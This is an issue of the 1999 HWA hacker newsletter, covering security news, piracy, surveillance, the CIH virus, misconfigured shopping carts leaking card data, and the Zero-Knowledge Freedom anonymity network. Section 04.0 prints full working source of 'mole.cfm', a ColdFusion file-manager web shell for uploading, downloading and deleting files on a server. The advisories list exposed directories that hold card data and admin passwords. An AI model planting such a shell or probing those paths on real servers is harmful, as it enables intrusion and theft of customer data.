from HNN http://www.hackernews.com April 30th
contributed by Sunny
SingNet and SingTel Magix, two ISPs located in
Singapore, have admitted to asking the Home Affairs
Ministry's IT security unit to scan 200,000 of its
subscribers to see if their systems are vulnerable to
hacker attacks. The ISPs asked the Ministry to perform
the scans because they where the "experts" in this
area. Users where not informed of the scans
beforehand. This new report of scans is evidently the
cause of yesterdays report that Ms Lee, 21, was being
"attacked" by the Ministry of Home Affairs. (Sure wish I
lived somewhere where everyone looked after my well
being so closely)
Straits Times
http://straitstimes.asia1.com.sg/one1/one1.html
Nando Times
http://www.techserver.com/story/body/0,1634,43806-70661-511093-0,00.html
++ India Stomping Out Piracy
From HNN http://www,hackernews.com/ April 29th
contributed by Dumbo
Officials in India want to stomp out piracy. They felt
that the best way to do this was put their foot down
and the bigger the foot the better. So they got an
elephant to stomp on confiscated pirated CDs in New
Delhi's Nehru Place.
http://www.news.com/News/Item/0,4,0-35780,00.html?st.ne.ni.lh
++ MS Sues FLA Companies
From HNN http://www,hackernews.com/ April 29th
contributed by Code Kid
Microsoft is suing 15 Florida companies alleging that
they sold or installed illegal copies of the companies
software. Microsoft isn't able to estimate how much
software piracy costs the company but it is able to
estimate what it costs the state of Florida. Microsoft
claims that Florida lost 7,186 jobs in 1997 and $490
million in lost wages, tax revenue and retail sales. Yet, it
has no idea what piracy costs Microsoft.
http://www.techserver.com/story/body/0,1634,43487-70127-507733-0,00.html
http://www.zdnet.com/zdnn/stories/news/0,4586,2249422,00.html
++ Antidote Vol. 2 #1 released
From HNN http://www.hackernews.com/
contributed to HNN by Lord Oak
The newest release of Antidote is now available. With
articles on Anonymous Surfing, ICQ99a Security
Glitches, Intruder Alert '99, the eBayla Bug and a whole
lot more.
Antidote; http://www.thepoison.org/antidote/issues/vol2/1.txt
++ Hackers Defended
From HNN http://www.hackernews.com/
contributed to HNN by erewhon
Mainstream media is actually publishing a positive and
accurate story about hackers. Better read it quick
before they pull it and come to their senses.
ABC News
http://abcnews.go.com/sections/tech/Geek/geek41.html
++ This has been up in the air for the last couple months or so, looks like
the ASIO (Australian Security Agency) is still pushing for the right to be
able to break into personal computers if such systems are thought to contain
data that is detrimental to the countries security...who watches the watchers?
From HNN http://www.hackernews.com/
ASIO wants Permission to Break into Home Computers.
contributed by Anonymous
The Australian Security and Intelligence Organization
wants a widening of its powers so that its agents may
'hack' into personal home computers. These new powers
will include the ability to manipulate data so that their
entry may not be detected as well as breaking
encryption around data that they want to see.
The Age; http://www.theage.com.au/daily/990428/news/news8.html
++ Keen Veracity 7 was released Apr 22nd I missed this last issue
-----------------------------------------------------------------------------
K E E N V E R A C I T Y
L E G I O N S O F T H E U N D E R G R O U N D
I S S U E # [7]
-----------------------------------------------------------------------------
--[CONTENTS]--
(1/8)--[Introduction]---------------------------------------[Digital Ebola]
(2/8)--[Redir games with ARP and ICMP]-------------------------------[yuri]
(3/8)--[FUN WITH THE ES-3810 AN ATM REALITY]--------------------[optiklenz]
(4/8)--[Ip Aliasing]-----------------------------------------------[guidob]
(5/8)--[Yet Another Newbies Guide to Linux Security]--------[Digital Ebola]
(6/8)--[UBE98 -- Unbreakable Encryption]----------------------[Joe Peschel]
(7/8)--[Windows 95 Protection]-------------------------------------[NtWak0]
++ b4b0 releases issue #7 also April 26th...full of goodness, get it today
(00). Greets, Hellos, Staff, What not.
(01). Introduction - by ph1x *y0r elite edit0r* (heed my advice)
(02). Hacking Shiva-Lan-Rover-Servers - [Hybrid]
(03). How to have an out of body experience - [ph1x]
(04). Womper language interpretor - [chrak]
(06). Buffer overflow exploitation - [ph1x]
(07). The stupidity that lies in credit fraud - [KKR]
(08). Screwing around with /dev/audio - [ph1x]
(09). My day in age(Firewall, a magic bullet?) - [rhinestone]
(10). d0x (For your harrassing enjoyment) - [pG]
(11). Coding a shell from the ground up - [ph1x]
(12). The art of writing shell code - [smiler]
(13). The telephone system/network part 1 - [pabell]
(14). Wu-ftpd remote/local exploit for [12]-[18] - [cossack/smiler]
(15). Wu-ftpd buffer overflow scanner for 12-18 - [ph1x]
(16). IRC lawgz, cybersex erotica - [b4b0]
(17). Revolution against the catholic church - [schemerz]
(18). bsaver.c overview - [cp4kt]
(19). Conclusion - [ph1x]
+ juarez ;)
Mucho thanks to Spikeman for directing his efforts to our cause of bringing
you the news we want to read about in a timely manner ... - Ed
@HWA
01.2 MAILBAG - email and posts from the message board worthy of a read
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
More great poetry from Liquid Phire!;
From: "liquid phire" <liquidphire@hotmail.com>
To: cruciphux@dok.org
Cc: Uzi@Rave-Generation.dnx.co.uk
Subject: greatness
Date: Mon, 26 Apr 1999 23:08:26 PDT
Mime-Version: 1.0
Content-type: text/plain
***another? yes *sigh* oh but i must. sanity is only as close as a
pen.***
"to be great is to be misunderstood"
we are to be remembered as names, not faces. we are to be remembered
as notions of truth, not as images flashed on the evening news. the
cost of infamy and fame are more then those who possess might care to
admit. it is better to be great without being misunderstood, to change
the world without attracting undesired attentions.
the time for lies has passed, this is a dangerous spell and we can
leave no option of damnation open. the future of the internet will be
determined by the actions of those on it now, advocates of censorship
have found new hope due to recent untimely events. sinners tricked as
saints are controling the country as we now walk on thin ice.
safe are we within our bunkers of pretenses until the ebon shadow of
reckoning nears, when the end comes we need more to hold close to our
translucent hearts then the newspaper clippings and the vauge texts
that are our legacy. the media has gotten the best of this religion,
and our minds have gotten the best of our hearts.
as but comic book superheros that have flown to close to the sun our
luck will not last and the curtins will one day part to reveal a few
disillusioned clutching close their tattered capes. already some have
sold out, a mistake that can be easily made but should be avoided to
protect the integrity of what we should represent.
hope for understanding is not one of the desires that lies in mens'
hearts, no war cry has ever been for peace. the walls of the fortress
need to be smooth with no cracks and fissures to provide the
weaknesses needed for foes. the masses, like fire, can be used for
both good and evil, it is those that tame them that save, or damn, the
world.
phiregod
liquidphire@hotmail.com
please excuse all errors
i welcome all comments and constructive criticism at the above address
_______________________________________________________________
Get Free Email and Do More On The Web. Visit http://www.msn.com
-=-
================================================================
@HWA
02.0 From the editor.
~~~~~~~~~~~~~~~~
#include <stdio.h>
#include <thoughts.h>
#include <backup.h>
main()
{
printf ("Read commented source!\n\n");
/*
*No comment, its issue 16 already, just read it.... ;-) this issue is dedicated to
*#99 and the folks in Denver... so sad we have to have copycats isn't it?
*
*
*
* - Ed
*
*
*/
printf ("EoF.\n");
}
Congrats, thanks, articles, news submissions and kudos to us at the
main address: hwa@press.usmc.net complaints and all nastygrams and
mailbombs can go to /dev/nul nukes, synfloods and papasmurfs to
127.0.0.1, private mail to cruciphux@dok.org
danke.
C*:.
@HWA
03.0 Telecardnews site, phone card and smartcard cracking
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://members.tripod.com/telecardnews/index.html
I stumbled across this site during web searches, it has some interesting info
on telephone card and smart card hacking and news about recent goings on in
that world.. here's a sampling of what they have online.
TELEPIRATES BUSTED ! Reports are
reaching us, as yet unconfirmed, that the notorious
Telepirates have been raided. "Heavies" allegedly in
the pay of Telecom Companies and Telecard
Manufacturers are believed to have carried out
vicious attacks on the Telepirates main premises in
Holland, Spain and USA. It is well known that they
had trusted agents world-wide who may or may not
have been effected by these raids and we await
confirmation of this report.
It can be confirmed that their main order page on the
net has been removed . This action may have been
performed by themselves or by the Law
Enforcement Agencies possibly involved. It has
been known for some time, that Gemplus (a major
smartcard producer) was thoroughly investigating
telecard piracy and those connected with it.
Nobody was more connected than the Telepirates
who flaunted their expertise across the whole world
wide web.
In view of this development, and a tip off from a
known Telepirate member. We recommend to our
readers (perish the thought that they would consider
anything remotely criminal) that they should not
under any circumstances send payments to the
Telepirates, until further notice as this will probably
end up sequestrated or in the hands of the
Authorities. It is also likely that Bank Accounts
have been compromised and possibly frozen.
Keep watching, we will keep you updated. If
you have any information regarding this
breaking story, contact us immediately in
confidence. We will not divulge the source.
send info
TELCOS INVOLVED IN BUST April 13th 1999
TELECARD SECURITY NEWS: This is the latest news on this story.
Our investigations confirm that major smartcard companies and telcos were at
least aware of the Telepirates bust. One international smartcard manufacturer
gave the following statement:
"We will neither confirm or deny any involvement concerning this criminal group.
Anyone who attempts to penetrate systems by illegal means, including the
perpetrators and their supposed clients are all law breakers and should be dealt
with only by the appropriate authorities".
We did contact representatives of other Telcos and smartcard manufacturers and
they all declined to comment on or off the record. In our enquiries to these
companies, we referred to the Telepirates only as "phonecard hackers who where
raided recently", yet two of these companies mentioned the "Telepirates" by name.
This was a touch suspicious and despite our insistance that they answer our
questions, the stock answer was "No Comment"!
Final Note: Our readers are reminded that THE TELECARD SECURITY NEWS cannot
condone or support any kind of illegal and criminal activities. We do strongly
support and encourage dissemination of information for security reasons and
lessons can be learned by all concerned....
Next update. Hopefully we will have more information from Telepirate spokesman
"Frazzle". Watch out for more of our news updates and if you have any information which
we can confirm. Please contact us: http://members.tripod.com/telecardnews/email.htm
@HWA
04.0 Coldfusion mole.cfm
~~~~~~~~~~~~~~~~~~~
This didn't make it into last weeks issue, here it is now, its the program that
can be used to up and download files to a coldfusion server.
From HNN http://www.hackernews.com/
<!---
This Cold Fusion template is intended for testing security
on ColdFusion application servers. It will let a web user
upload, download and delete files on a server.
Use this only for good, not evil.
Kevin Klinsky
kklinsky@themerge.com
--->
<CFPARAM NAME="DirPath" DEFAULT="#GetTempDirectory()#">
<CFSET THISTEMPLATE=GETFILEFROMPATH(GETTEMPLATEPATH())>
<CFIF LISTLAST("#DirPath#","\") IS ".">
<CFSET DIRPATH=GETDIRECTORYFROMPATH(DIRPATH)>
<CFELSEIF LISTLAST("#DirPath#","\") IS "..">
<CFSET DIRPATH=GETDIRECTORYFROMPATH(LEFT("#GetDirectoryFromPath(DirPath)#",LEN(GETDIRECTORYFROMPATH(DIRPATH))-1))>
</CFIF>
<CFIF ISDEFINED("uploadfile")>
<CFIF LEN(UPLOADFILE) GT 0>
<CFFILE ACTION="UPLOAD"
FILEFIELD="uploadfile"
DESTINATION="#DirPath#"
NAMECONFLICT="OVERWRITE">
File uploaded<BR><BR>
</CFIF>
</CFIF>
<CFIF ISDEFINED("deletefile")>
<CFSET DELETEFILE=DIRPATH&DELETEFILE>
<CFIF FILEEXISTS(DELETEFILE)>
<CFFILE ACTION="DELETE"
FILE="#deletefile#">
File deleted<BR><BR>
</CFIF>
</CFIF>
<CFIF GETFILEFROMPATH(DIRPATH) IS "" OR GETFILEFROMPATH(DIRPATH) IS ".">
<CFDIRECTORY DIRECTORY="#DirPath#"
NAME=DIRDETAILS
SORT="name ASC">
<CFOUTPUT>
<FONT SIZE="+2">#DirPath#</FONT><BR>
</CFOUTPUT>
<TABLE>
<TR>
<TD></TD>
<TD>Name</TD>
<TD ALIGN="right">Size</TD>
<TD>Modified date</TD>
</TR>
<CFOUTPUT QUERY="DirDetails">
<CFSET NEWPATH = URLENCODEDFORMAT(DIRPATH&NAME)>
<CFIF TYPE IS "Dir" AND NAME IS NOT "." AND NAME IS NOT "..">
<CFSET NEWPATH=NEWPATH&"\">
</CFIF>
<TR>
<TD>[#Type#]</TD>
<TD><A HREF="#ThisTemplate#?DirPath=#NewPath#">#Name#</A></TD>
<TD ALIGN="right">#Size#</TD>
<TD>#DateLastModified#</TD>
<CFIF TYPE IS "File">
<FORM ACTION="#ThisTemplate#?DirPath=#GetDirectoryFromPath(DirPath)#&deletefile=#URLEncodedFormat(Name)#" METHOD="post">
<TD><INPUT TYPE="submit" VALUE="Delete"></TD>
</FORM>
</CFIF>
</TR>
</CFOUTPUT>
</TABLE>
<CFOUTPUT>
<FORM ACTION="#ThisTemplate#?DirPath=#URLEncodedFormat(DirPath)#" ENCTYPE="multipart/form-data" METHOD=POST>
<INPUT TYPE="File" NAME="uploadfile" SIZE="30"><BR>
<INPUT TYPE="submit" VALUE=" Upload ">
</FORM>
</CFOUTPUT>
<CFELSE>
<CFFILE ACTION="Read"
FILE="#DirPath#"
VARIABLE="var_name">
<CFCONTENT TYPE="unknown:security.breach" FILE="#DirPath#" DELETEFILE="No">
</CFIF>
for more info on the ColdFusion hole and how to protect yourself or see if your server is vulnerable check
http://www.403-security.org/Htmls/news.htm and follow the bugtraq link.
@HWA
05.0 More info on the CIH virus
~~~~~~~~~~~~~~~~~~~~~~~~~~
April 26th from www.403-security.org
CIH virus infects Windows 95 and 98 EXE files. After an infected EXE is executed, the virus will stay in memory and
will infect other programs as they are accessed.
The CIH virus was first located in Taiwan in early June. After that, it has been confirmed to be in the wild in at least
France, Germany, The Netherlands, Sweden, China, Israel, Chile and Australia. CIH has been spreading very quickly
as it has been distributed through pirated software.
It seems that at least four underground pirate software groups got infected with the CIH virus, and they inadvertently
spread the virus globally in new pirated softwares they released through their own channels. These releases include
some new games which will spread world-wide very quickly. There's also a persistent rumor about a 'PWA-cracked
copy' of Windows 98 which would be infected by the CIH virus but Data Fellows has been unable to confirm this.
Later on, CIH was available by accident from several commercial websites, including the Origin Systems website
where a download related to the popular Wing Commander game was infected.
What makes the CIH case really serious is that the virus activates destructively. When it happens the virus overwrites
most of the data on the computers hard drive. This can be recovered with recent backups.
However, the virus has another, unique activation routine: It will try to overwrite the Flash BIOS chip of the machine.
If this succeeds, the machine will be unable to boot at all unless the chip is reprogammed. The Flash routine will work
on many types of Pentium machines - for example, on machines based on the Intel 430TX chipset. On most
machines, the Flash BIOS can be protected with a jumper. By default, protection is usually off.
The CIH virus infects Windows executable files (EXE files). It does not infect Word or Excel documents. CIH works
under both Windows 95 and Windows 98, but it does not work under Windows NT.
CIH uses a peculiar way of infecting executables. As a result, the size of the infected files does not grow at all. The
actual size of the virus code is around 1 kB. The virus also employees advanced tricks in jumping from processor ring
3 to ring 0 in order to hook file system calls.
There are four known closely-related variants:
CIH v1.2 (CIH.1003): Activates on April 26th. This is the most common variant. It contains this text:
CIH v1.2 TTIT
CIH v1.3 (CIH.1010.A and CIH.1010.B): Activates on June 26th. Contains this text:
CIH v1.3 TTIT
CIH v1.4 (CIH.1019): Activates on 26th of every month. It is in the wild, but not particularily common. It contains
this text:
CIH v1.4 TATUNG
Note on disinfection: If you're using F-Secure Anti-Virus for Windows 95 v4.02, you need to exit Windows to disinfect
CIH. Choose Start/Restart in MS-DOS mode, then execute FSAV for DOS from the FSAV CD-ROM and disinfect your
hard drive with that.
By Astral
@HWA
06.0 E-commerce takes it in the gnards, more compromised carts
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Tue, 27 Apr 1999 14:39:47 +0200
From: Bo Elkjaer <boo@DATASHOPPER.DK>
To: BUGTRAQ@netspace.org
Subject: Re: Shopping Carts exposing CC data
Been doing some more searches for misconfigured webcarts exposing cc-information.
Seems like a pandora's box, that just opened.
Perlshop is vulnerable too if misconfigured:
Version?
Platforms?
Executable file: perlshop.cgi
Exposed directory: /store/customers/, /store/temp_customers/
Exposed orderinfo: Several files, eight-digit numbered names.
Status: adverware. Only requirement is to display a "powered by perlshop"-logo on
page.
Bo Elkjaer, Denmark
-=-
(hhp) SMPS advisory. (hhp)
----------------------------------------------
SMPS (Server merchant payment system) has default permission problems. The wrong
moded directory is Cybercashserver/smps* which gives complete access to view all the config
and database files. The most dangerous file that is left world readable is:
Cybercashserver/smps*.../merchants/admin.pw or maybe another various directory path/location
depending on the server and version of the software. The admin.pw contains a crypt(3)
passwd. This could lead to a system-wide compromise if it was to be cracked.
The official website for this software that was found in the README file currently
doesnt allow access to view the website which made it hard for me to build more information
about this software.
My suggestions to admins using this software is to disable this software, change
the modes on the directory and get in contact with the vendor of this software and find out
when they plan to release a new version of this software fixing this defualt problem. If
you want to play it safe, I would check your server to see if you have already been
cracked and hacked.
I have notified the vendors of this software about the problem and hope the best
to all the clients.
-elaich
4-29-99 10:35:53pm CST
-----------------------------------------
elaich of the hhp. hhp-1999(c)
Email: hhp@hemp.net
Web: http://hhp.hemp.net/
Voice: 1-800-Rag-on-gH pin: The-hhp-crew
hhp-ms: hhp.hemp.net, port:7777, pass:hhp
-----------------------------------------
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGPfreeware 6.0 for non-commercial use <www.pgp.com>
mQGiBDcl8CwRBAD7xCp+A5ORiRzMLS4mPstL1aJadSCXSGyNKEZZ6kZwdO3YhLCf
2vkeJF0OGe8KRfd8LRxP0f/3syg7lfH77m0OP8NXeoOHD48T8K4Mabp2WEJmUW0r
J6op94LjFUwqNqYuOa+bVULrotZY6iWlxBWunltu9wrqgP22RVtKAu0PVwCg/2SS
rYoDCNTH4dlzNcVcza5XuhMEALbmuKISbjeOqsVETYYMdQfr0M/m1YfztjJ2tDS7
bGfOCFpQUFLyCUt/FHHmlInXQWUSVCgjkp0/giFoY9dX+4IB8wLgfu68BOZM5fft
I5mxI0vyBSke2kHQTqf3vQ5Yveg6gIB8WW9Pi+MAwLMS3+Hmrar+4GCUOqe9w3yi
u1q3BADcAM3VkORpkifjK8pWex1fdfvGmLBX5PBuCexl5dpeXdVC+Ktncis9u4yh
5f/PI/g/Uk4T2D/nF5PA4tSkNvRJaPVZCXjFRfc4K+rzQxuYRePwXFgaHSk9cDnd
XBq5JM6iXLBGFIJpbbwWkftuFOaJLXdP/DqDaXkjbWXLbH9nN7QhZWxhaWNoIG9m
IGhocC4gPGhocEBoaHAuaGVtcC5uZXQ+iQBLBBARAgALBQI3JfAsBAsDAgEACgkQ
bSmqkM1thIxvkQCeIEUYJTwF5nC+T9DUcUqStqpwtiQAoIzw9fqSB026Q+w0CGWe
BPX9LD5ruQINBDcl8DMQCAD2Qle3CH8IF3KiutapQvMF6PlTETlPtvFuuUs4INoB
p1ajFOmPQFXz0AfGy0OplK33TGSGSfgMg71l6RfUodNQ+PVZX9x2Uk89PY3bzpnh
V5JZzf24rnRPxfx2vIPFRzBhznzJZv8V+bv9kV7HAarTW56NoKVyOtQa8L9GAFgr
5fSI/VhOSdvNILSd5JEHNmszbDgNRR0PfIizHHxbLY7288kjwEPwpVsYjY67VYy4
XTjTNP18F1dDox0YbN4zISy1Kv884bEpQBgRjXyEpwpy1obEAxnIByl6ypUM2Zaf
q9AKUJsCRtMIPWakXUGfnHy9iUsiGSa6q6Jew1XpMgs7AAICB/oCoABrcAodA+Qw
0QOzptm6arxtaRte4a6ZQs+N4Y63+S5oKBz4/atHGGIqgcxCUaaPCxfcqRMoz6Tw
ZhxOKe3/xKA+qPRfLP19P3nHcTLZqa/orvohDu235OQHBd5Mi6sr2MUcUL1WfsU7
fPZEjwu6d3MuXpjJUeFzNezJzIbXNzqFAVQawVH6lV+xGfqjD0zceGFGALvvGVxL
ANdmCzqjE1LFbqf1Zdd04lKYKSglX4PFz3Ly/jzi22GFxMuGf6ud4R80wUC0zBKO
RZHX3jPqjrqfbY9dq1vpBNDEugOYPqv3/lNlkoxUzKhJCZLPUcbQQs+BuNUUcRW9
dEkl71kuiQBGBBgRAgAGBQI3JfAzAAoJEG0pqpDNbYSMFgIAoMUE0SGIfqg0oj9e
oY9AHDAScmZtAKDgKF7STtRwB4KJ6/Q9HC3gUgGBbA==
=GJ0e
-----END PGP PUBLIC KEY BLOCK-----
06.1 E-commerce boom fueling Security Holes?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.thestandard.net/articles/display/0,1449,4307,00.html?home.tf
E-commerce Boom Fueling
Security Holes?
By Jack McCarthy and Elinor Mills
Recent breaches of customer privacy by online stores shows that early
concerns for Internet security were justified, industry experts said,
adding that smaller businesses rushing to get online are often the
culprits.
Just this week, an employee at an Internet service provider in Bellevue,
Washington, posted a warning on the Internet to systems administrators
and Web developers about the potential for Web sites exposing
information as a result of misconfigured e-commerce software.
Joe Harris, systems administrator for Blarg Online Services which hosts
e-commerce sites for companies, said Thursday that he discovered last
week that more than 100 online stores hosted by Blarg were inadvertently
revealing customer names, addresses, credit card numbers and other
purchasing information. One of the ways random Internet users could access
the information was by using certain keywords while doing searches on the
sites, he said.
Since he posted the warning, many of the affected Web sites have corrected
the problem, Harris said, but at least two stores were still exposing
customer information on their sites Thursday.
Such privacy breaches are expected to increase as more retailers go online.
"With the growth of the Internet and the use of e-commerce, you're going to get
more and more of these situations," said Bob Lewin, executive director of TRUSTe, a
Cupertino, Calif.-based group that monitors online privacy practices and offers seals of
approval to Web sites that agree to follow basic privacy guidelines.
Experts say the privacy breaches seem to be happening primarily with smaller
companies that might not have the expertise and sophistication to properly install
electronic commerce software or the money to hire experienced firms to do it for them.
"It's definitely an issue that impacts smaller online merchants that are either using
multiple site hosting services or are building their own using these simpler [turnkey]
commerce packages," said David Kerley at Jupiter Communications market research firm
in New York. "It's an area that larger online merchants are more sensitive to and more
knowledgeable about."
Along with the dramatic growth of e-commerce, smaller companies are racing
to sell online and creating greater demand than can be met for people who know how
to create secure Web sites, according to Kerley, "so people who aren't as experienced
are getting into the business."
Amateur Web designers can fail to follow instructions in using shopping-cart software
that takes orders from customers, Harris said. When the software is improperly
installed, the information can be exposed, for instance by being stored on a file that is
accessible to web surfers, he said.
Many small retailers use friends or untested companies to develop their Web sites, Harris
said. "They hear that their sister-in-law's cousin can do it, so they hire him," he said.
Basically, companies should be careful in selecting firms to set up and host their
e-commerce sites by getting references, using established firms and asking about privacy
and security upfront, the experts said. If they don't they'll not only lose
customers but growth of e-commerce in general will be impeded,
Lewin of TRUSTe said. "If you are going to put your store on the Web,
you are responsible for the information that's there," Harris said. "Your
client is trusting you to make sure you do everything in your power to
make sure that data is safe."
While smaller companies may be primarily at fault for privacy breaches
lately, data exposures at Web sites run by larger companies also can
happen and when they do they can pose an even greater risk,
according to Ari Schwartz, policy analyst at the Center for Democracy
and Technology in Washington, D.C.
"Smaller companies do cut corners, but the larger companies usually
have large databases and there's a lot more at stake, he said. "So
both [types of companies] need to pay adequate attention, especially
those people implementing software solutions for large numbers of
small companies."
At the same time, companies are becoming more aware of the
necessity for security. Nearly 700 Web sites are members of Truste
and more are joining all the time, Lewin said. "The majority of our
licensees are smaller organizations," he said. They "don't have time to
do the necessary investigations to find out what they should be doing
in the first place."
On their end, consumers should try to find out how secure the sites
they buy things from are. "It's no different than other markets. Buyer
beware," said Kerley of Jupiter.
There also need to be technical solutions that make it easier for
people to read privacy notices online so they can determine whether
the Web site is as secure as they want it to be, said Schwartz of the
CDT.
"Seems as though it takes a violation of peoples' privacy to make
people pay attention," Schwartz added.
The federal government may eventually give online merchants a push
in the direction of guaranteeing security. Although the Clinton
administration favors allowing the industry to regulate itself, agencies
such as the Department of Commerce and the Federal Trade
Commission have been discussing how to encourage privacy
protection and lawmakers have talked about enacting laws that would
make Web sites liable for privacy breaches on their sites.
Despite the privacy lapses that are occurring in the retailer rush to
sell online, the risk is still minimal to most consumers, according to
Kerley at Jupiter.
"There's not a huge risk for the consumer except to maybe have to
cancel a credit card," he said. "There are far more shady businesses
that are not on the Internet that have access and do access personal
information of a more sensitive nature. All it takes is a few dollars to
get a credit rating and credit report," for example, Kerley said.
Jack McCarthy and Elinor Mills write for the IDG News Service.
@HWA
07.0 Anonymity guaranteed (PCworld)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.pcworld.com/pcwtoday/article/0,1510,10700,00.html
Anonymity Guaranteed on the Net
For $9.95 per year, ISPs will erase all trace of your
Web travels.
by David Needle, special to PC World
April 26, 1999, 9:48 a.m. PT
Superman had a secret identity, and soon you may too, thanks to Zero Knowledge Systems, an Internet
security company that wants to give Web surfers total online privacy.
ZKS has created the Freedom Network, a band of 50 Internet service providers that route encrypted data
through what the company says is an untraceable path. Any data that represents your presence on the
Internet is encrypted and bounced around servers in the Freedom Network so there is no digital trail of who you
are or where you've been.
For the time being, participation in the Freedom Network is free while participating ISPs finish testing
their software. A full-fledged Windows-based client is due out later this summer for $49.95, complete with five
secret identities, aka "nyms," or pseudonyms. A 45-day free trial version will also be available. After the
first year, the cost is $9.95 per year, per nym.
"We're giving Internet users total privacy, which they've never had before," says Austin Hill, president of Zero
Knowledge Systems. "We don't even ask you to trust us because even we don't know where you are browsing."
You don't even have to belong to a Freedom Network ISP to join, though Hill says there may be some
performance advantage if you do. ISPs in the Freedom Network tend to be small to midrange players, with
larger Web providers taking a wait and see approach."Later on we'll want to bring some of the larger ISPs on
board," says Hill.
The Downsides of Privacy
"The privacy feature can't degrade the user experience it has to be invisible," says Jim Balderston, Director of
Zona Research. "And if you are promising 100 percent privacy protection, you have to deliver because
consumers aren't going to accept anything less."
Some people worry that greater Internet anonymity means more scam artists and criminal activity. For
example, an anonymous Web surfer might have an easier time harassing people online. However, ZKS
attempts to limit online harassment by honoring requests not to receive e-mail from nyms. And
harassment should be somewhat limited because it costs money to establish a pseudonym, according to
Hill.
"Like all freedom, this can be abused or used for good," says Hill. But, he adds, "we don't outlaw cars because
people sometime have accidents in them."
Worth the Price?
Still, are privacy guarantees worth even a small price to your average, law-abiding Web user already paying $20
or more per month to get online?
For a lot of people, yes. Parents, for example, might join the Freedom Network so that their children can
participate in online chat rooms without divulging their identity.
"The issue of privacy is a substantial one," says Zona's Balderston. "People don't realize how much information
has already been gathered about them. When you start seeing pop-up screens that say 'You bought boots at
such-and-such a Web site, now check out our camping gear,' that will be distressing to a lot of people; they're
going to look for some way to have anonymity online."
ISPs also benefit from joining the Freedom Network,Hill says, because it limits their legal liabilities. "We've
seen cases where users get into a flame war that ends up in a civil suit and the ISP gets dragged in," says
Hill. "It's a lot easier to be able to say, 'I don't have any data on this.' It's an encrypted stream of traffic."
"Our customers are deeply concerned about online privacy," says Paul Engels, vice president of I.D.
Internet Direct, Canada's second largest ISP and a member of the Freedom Network. Engels calls the ZKS
network "the most comprehensive and credible effort to put privacy back where it belongs--in our customers
hands."
@HWA
07.1 Anonymity guaranteed?
~~~~~~~~~~~~~~~~~~~~~
FreedomTM is easy-to-use software designed to give you total privacy
while on the Internet. This driver-level software runs in conjunction
with all your current Internet software, ensuring your privacy in a
totally transparent, unobtrusive way. Freedom uses high-grade public
key cryptography to encrypt the contents of any Internet
transmission, including e-mail, chat room, web browsing and
newsgroups. It also protects the source and destination of all Internet
traffic.
Freedom simultaneously
manages all of your digital identities,
watches all outbound traffic for personal information and
automatically encrypts and routes traffic through the Freedom
network,
transparently decrypts all incoming traffic,
places cookies into Cookie JarsTM,
filters spam.
Customized pseudonyms to manage your identities
Freedom allows you to create one or several digital pseudonyms. A
digital pseudonym lets you create a unique online identity for yourself
(which may or may not be like your true self) that you can use to
perform all your Internet-related tasks. You are the sole owner of the
pseudonyms, which can be configured to have different e-mail
addresses, geographic locations and encryption keys. Different
pseudonyms give you the opportunity to separately explore
completely different areas of the Internet and avoid being profiled by
Internet marketers.
Who do you want to be today?
You choose how to use your online identities. For example, if you like
to debate politics online you can designate one pseudonym as your
"politics" pseudonym. Use it when you post in political newsgroups,
surf activist web sites, e-mail your political contacts and chat in
political chat rooms. No one can trace it back to your real self.
Any concern you have about people monitoring you or collecting your
personal information on the Internet is gone. Your boss will not be
able to find out what you like to chat about on your own time.
Marketers cannot generate a profile of you and put you onto mailing
lists without your consent.
No one--not even Zero-Knowledge Systems--will be able to find out
who is behind a digital identity.
Full strength encryption and Cookie JarsTM
Each digital identity uses full strength encryption that ranges from
128-4096 bits. This transparent encryption permits all outgoing
Internet packets, e-mail and newsgroup postings to be encrypted,
and where appropriate, digitally signed by the pseudonym's public
key.
Every Freedom user is connected to a Freedom server that
anonymizes source information to protect your identity. When
sending e-mail both the sender and recipient's addresses are
encrypted, as well as the message itself.
Many web site place cookies (little bits of information) on your
computer to record and customize your visit. To prevent cookies from
revealing or correlating any of your identities, Freedom has a cookie
management system called Cookie Jars. Each digital identity has its
own Cookie Jar, and any cookie received by that identity is collected
in its individual jar. This way, your digital identities remain completely
separate from each other and from your real self.
Advanced spam control
Freedom also has advanced spam filtering tools so you can filter out
unwanted, unsolicited e-mail sent to your pseudonyms. When
enabled, Freedom's anti-spam functions eliminate 100% of unwanted
bulk email before it even gets to your mailbox.
For a complete list of Freedom's features and technical details, see
the white paper.
07.2 ZKS White paper
~~~~~~~~~~~~~~~
For diagrams (there are only two) view in html mode or visit this url
http://www.zeroknowledge.com/products/Freedom_Architecture.html
The Freedom Network Architecture
(Version 1.0)
Zero-Knowledge Systems, Inc.
This document describes the architectural components of the Freedom network. This document is intended for system administrators and potential Freedom Server operators. A solid
understanding of networking terminology and acronyms, such as SMTP, POP3, HTTP, TCP/IP, etc. is assumed. Familiarity with previously deployed building blocks of Internet privacy
systems, such as nymservers and remailers, is desirable. If you are unfamiliar with any of the above, please consult the sources listed in the bibliography at the end of this document.
<img src="http://www.zeroknowledge.com/products/cloud_diagram.gif" border=0></a>
Client-server Architecture
The Freedom product is composed of two primary elements: the client application and the server network. Any Internet user wishing to protect their privacy needs the Freedom client
application installed on their computer. The client application is compatible with current Internet protocols and works transparently. The server network is known as the Freedom
network. The Freedom network is made up of numerous Internet servers running the Freedom server-side application. The Freedom network provides a mechanism to ensure anonymous
connections between user and destination.
Freedom Network Components
Freedom Server Nodes
The Freedom Server Nodes are at the core of the Freedom network. Freedom Server Nodes have been deployed by ISP's, individuals, and organizations worldwide. The nodes are owned
and operated by Freedom partners independently of Zero Knowledge Systems. This assures that the user's privacy will be protected even if Zero Knowledge Systems itself was subject
to compromise. Each Freedom Server Node is comprised of four logical sub-systems. The subsystems are: Anonymous Internet Proxy (AIP), Anonymous Mail Proxy (AMP), Wormhole,
and Traffic Shaper.
Anonymous Internet Proxy (AIP)
The AIP provides the underlying anonymous TCP/IP connections. While current Freedom clients support only TCP-based protocols (with the exception of DNS), the AIP itself operates
at the IP level, thus allowing maximum flexibility for future feature enhancements and support for non-TCP based protocols. Each AIP performs the following actions upon startup.
